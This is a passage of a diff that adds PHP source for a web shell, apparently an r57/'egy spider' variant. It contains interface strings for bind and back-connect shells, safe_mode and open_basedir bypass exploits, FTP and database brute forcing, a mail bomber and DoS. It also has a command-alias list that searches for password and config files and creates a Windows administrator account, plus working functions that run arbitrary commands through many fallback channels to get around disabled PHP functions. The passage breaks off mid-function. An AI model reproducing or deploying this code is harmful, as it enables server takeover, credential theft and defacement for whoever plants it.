+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! 
Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_butt65'=>'Create',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for 
ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! 
Can\'t sent mail',
+'eng_err7'=>'Mail send',
+'eng_text200'=>'read file from vul copy()',
+'eng_text500'=>'read file from id()',
+'eng_text555'=>'read file from imap()',
+'eng_text202'=>'where file in server',
+'eng_text300'=>'read file from vul curl()',
+'eng_text203'=>'read file from vul ini_restore()',
+'eng_text204'=>'write shell from vul error_log()',
+'eng_text205'=>'write shell in this side',
+'eng_text206'=>'read dir',
+'eng_text207'=>'read dir from vul reg_glob',
+'eng_text208'=>'execute with function',
+'eng_text209'=>'read dir from vul root',
+'eng_text210'=>'DeZender ',
+'eng_text211'=>'::safe_mode off::',
+'eng_text212'=>'colse safe_mode with php.ini',
+'eng_text213'=>'colse security_mod with .htaccess',
+'eng_text214'=>'Admin name',
+'eng_text215'=>'IRC server ',
+'eng_text216'=>'#room name',
+'eng_text217'=>'server',
+'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
+'eng_text225'=>'MySQL Safe Mode Bypass 4.4.7 / 5.2.3 PHP ',
+'eng_text226'=>'Safe Mode Bpass Root Directory: ',
+'eng_text227'=>'Safe_Mode Bypass 4.4.2/5.1.2: ',
+'eng_text228'=>'tools for hacker vb ',
+'eng_text230'=>'know pass of cpanel ',
+'eng_text219'=>'Get file to server in safe_mode and change name',
+'eng_text220'=>'show file with symlink vul',
+'eng_text221'=>'zip file in server to download',
+'eng_text222'=>'2 symlink use vul',
+'eng_text223'=>'read file from funcution',
+'eng_text224'=>'read file from PLUGIN ',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_butt3' =>'Bind',
+'eng_butt4' =>'Connect',
+'eng_butt5' =>'Run',
+'eng_butt6' =>'Change',
+'eng_butt7' =>'Show',
+'eng_butt8' =>'Test',
+'eng_butt9' =>'Dump',
+'eng_butt10'=>'Save',
+'eng_butt11'=>'Edit file',
+'eng_butt12'=>'Find',
+'eng_butt13'=>'Create/Delete',
+'eng_butt14'=>'Download',
+'eng_butt15'=>'Send',
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on 
server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_text30'=>'Cat file',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_text44'=>'Can\'t edit file! 
Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without arch.',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'/etc/passwd',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu)',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
+'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
+'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
+'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
+'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
+'eng_text125'=>'Data',
+'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
+'eng_text128'=>'Modify/Access file (touch)',
+'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
+'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
+'eng_text134'=>'Database-bruteforce',
+'eng_text135'=>'Dictionary',
+'eng_text136'=>'Creating evil symlink',
+'eng_text137'=>'Useful',
+'eng_text138'=>'Dangerous',
+'eng_text139'=>'Mail Bomber',
+'eng_text140'=>'DoS',
+'eng_text141'=>'Danger! Web-daemon crash possible.',
+'eng_text142'=>'Downloaders',
+'eng_text143'=>'Temp: ',
+'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
+'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
+'eng_text146'=>'Max Interation',
+'eng_text151'=>'Test bypass safe_mode with chdir()and ftok() (PHP <= 5.2.6)',
+'eng_text161'=>'Test bypass safe_mode with posix_access() (posix ext) (PHP <= 5.2.6)',
+'eng_text162'=>'ionCube extension safe_mode and disable_functions protections bypass (PHP <= 5.2.4)',
+'eng_text163'=>'PHP Perl Extension Safe_mode Bypass Exploit',
+'eng_text170'=>' Test bypass safe_mode and Open_basedir Settings by Posix_getpw (PHP <= 4.2.0)',
+'eng_text171'=>' PHP (Win32std) Extension safe_mode/disable_functions Protections Bypass (PHP <= 5.2.3)',
+'eng_text147'=>'',
+'eng_text148'=>'',
+'eng_text149'=>'',
+'eng_text150'=>'',
+'eng_text159'=>'About egy spider',
+'eng_text152'=>'Latest News',
+'eng_text153'=>'Logout ',
+'eng_text154'=>'Quick index ',
+'eng_text155'=>'Mass Code Injection ',
+'eng_text156'=>'File source ',
+'eng_text157'=>'Registration in Zone-h ',
+'eng_text158'=>'Hash Tools ',
+'eng_text160'=>'Home Shell ',
+'eng_text180'=>'Send Your Comments And Contacted Me ',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????. 
+*/
+$aliases=array(
+'----------------------------------locate'=>'',
+'find httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate httpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate proftpd.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate psybnc.conf'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate my.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate admin.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate cfg.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate conf.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.dat files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.inc files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.inc.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.default.php files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .pwd files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .sql files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .htpasswd files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .bash_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate .mysql_history files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate backup files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate dump files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate priv files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'locate vhosts.conf files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'________________find orders ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'cat /var/cpanel/accounting.log'=>'cat /var/cpanel/accounting.log',
+'find all site of server and user'=>'ls -la /etc/valiases',
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . 
-type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find / -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . 
-type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'________________var orders var______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ error_log files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ access.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ error.log files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ &quot;*.log&quot; files'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'________________for server windows ______________-'=>'/tmp/grep.txt;cat /tmp/grep.txt',
+'1_learn the management server'=>'net user',
+'2_add new user'=>'net user egy_spider 123456 /add',
+'3_add your user for admin group (this order after add order 1&2'=>'net localgroup administrators egy_spider /add',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2 = " ::</div></b></font></td></tr><tr><td>";
+$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
+ if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else
+ {
+ echo '<center>';
+ foreach($users as $user) { echo $user."<br>"; }
+ echo '</center>';
+ }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
+ }
+
+if (!empty($_POST['dir'])) { 
if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
+if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = @php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+ {
+ if(@eregi("^win",$os)) { $unix = 0; }
+ else { $unix = 1; }
+ }
+ }
+
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+ {
+ echo $head;
+
+ if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+ else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+ $sr->SearchText(0,0);
+ $res = $sr->GetResultFiles();
+ $found = $sr->GetMatchesCount();
+ $titles = $sr->GetTitles();
+ $r = "";
+ if($found > 0)
+ {
+ $r .= "<TABLE width=100%>";
+ foreach($res as $file=>$v)
+ {
+ $r .= "<TR>";
+ $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+ $r .= (!$unix)? 
str_replace("/","\\",$file) : $file;
+ $r .= "</b></font></ TD>";
+ $r .= "</TR>";
+ foreach($v as $a=>$b)
+ {
+ $r .= "<TR>";
+ $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+ $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+ $r .= "</TR>\n";
+ }
+ }
+ $r .= "</TABLE>";
+ echo $r;
+ }
+ else
+ {
+ echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+ }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
+ die();
+ }
+
+/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/
+if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;}
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+
+function ex($cfe)
+{global $unix,$tempdir;
+ $res = '';
+ if (!empty($cfe))
+ {
+ if(@function_exists('exec'))
+ {
+ @exec($cfe,$res);
+ $res = join("\n",$res);
+ }
+ elseif(@function_exists('shell_exec'))
+ {
+ $res = @shell_exec($cfe);
+ }
+ elseif(@function_exists('system'))
+ {
+ @ob_start();
+ @system('$cfe');
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(@function_exists('passthru'))
+ {
+ @ob_start();
+ @passthru($cfe);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r")))
+ {
+ $res = "";
+ if(@function_exists('fread') && @function_exists('feof')){
+ while(!@feof($f)) { $res .= @fread($f,1024); }
+ }else if(@function_exists('fgets') && @function_exists('feof')){
+ while(!@feof($f)) { $res .= @fgets($f,1024); }
+ }
+ @pclose($f);
+ }
+ elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
+ {
+ $res = "";
+ if(@function_exists('fread') && @function_exists('feof')){
+ while(!@feof($pipes[1])) {$res .= 
@fread($pipes[1], 1024);} + }else if(@function_exists('fgets') && @function_exists('feof')){ + while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} + } + @proc_close($f); + } + }else{$res = safe_ex($cfe);} + return htmlspecialchars($res); +} + + +function safe_ex($cfe) +{global $unix,$tempdir; + $res = ''; + if (!empty($cfe)) + { + if(extension_loaded('perl')){ + @ob_start(); + $safeperl=new perl(); + $safeperl->eval("system('$cfe')"); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(!$unix && extension_loaded('ffi')) + { + $output=$tempdir.uniqid('NJ'); + $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); + if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);} + else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded('win32service')) + { + $output=$tempdir.uniqid('NJ'); + $n_ser=uniqid('NJ'); + if(!@function_exists('escapeshellarg')) + {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));} + else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));} + @win32_start_service($n_ser); + @win32_stop_service($n_ser); + @win32_delete_service($n_ser); + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix && extension_loaded("win32std")) + { + $output=$tempdir.uniqid('NJ'); + if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' 
> "'.$output.'"');} + while(!@file_exists($output))sleep(1); + $res=moreread($output); + @unlink($output); + } + elseif(!$unix) + { + $output=$tempdir.uniqid('NJ'); + $suntzu = new COM("WScript.Shell"); + if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');} + else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');} + $res=moreread($output); + @unlink($output); + } + elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork')) + { + $res = '[~] Blind Command Execution via [pcntl_exec]\n\n'; + $output=$tempdir.uniqid('pcntl'); + $pid = @pcntl_fork(); + if ($pid == -1) { + $res .= '[-] Could not children fork. Exit'; + } else if ($pid) { + if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} + else {$res .= '[-] Error. Command incorrect.';} + } else { + $cfe = array(" -e 'system(\"$cfe > $output\")'"); + if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0); + if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0); + die(); + } + $res=moreread($output); + @unlink($output); + } +/* elseif(1) + { + + } +*/ + } + return htmlspecialchars($res); +} + +function get_users($filename) +{ + $users = $rows = array(); + $rows=@explode("\n",moreread($filename)); + if(!$rows[0]){$rows=@explode("\n",readzlib($filename));} + if(!$rows[0]) return 0; + foreach ($rows as $string) + { + $user = @explode(":",trim($string)); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { 
$type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." 
